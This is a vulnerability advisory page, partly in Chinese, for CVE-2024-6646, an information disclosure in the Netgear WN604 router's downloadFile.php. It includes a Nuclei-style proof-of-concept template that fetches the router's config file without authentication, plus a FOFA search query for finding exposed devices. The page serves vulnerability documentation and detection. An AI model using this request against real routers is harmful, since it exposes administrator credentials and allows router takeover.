CVE-2024-6646: Netgear-WN604 downloadFile.php - Information Disclosure

日期: 2025-08-01 | 影响软件: Netgear-WN604 | POC: 已公开

漏洞描述

There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.

PoC代码[已公开]

id: CVE-2024-6646

info:
  name: Netgear-WN604 downloadFile.php -  Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.
  reference:
    - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
    - https://github.com/mikutool/vul/issues/1
    - https://vuldb.com/?ctiid.271052
    - https://vuldb.com/?id.271052
    - https://vuldb.com/?submit.367382
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-6646
    cwe-id: CWE-200
    epss-score: 0.93133
    epss-percentile: 0.99785
    cpe: cpe:2.3:h:netgear:wn604:*:*:*:*:*:*:*:*
  metadata:
    fofa-query: title=="Netgear"
    product: wn604
    vendor: netgear
  tags: cve,cve2024,netgear

http:
  - method: GET
    path:
      - "{{BaseURL}}/downloadFile.php?file=config"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "system:basicSettings"
          - "system:staSettings"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/force-download"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008a49b073708a87f41283606c48c757a7b1f63851698ffdeebba9ab78d4c23b8402205d26f09ec73429a79d04211be3c5650f2d6257db45bc3f015968e4878459f4e4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐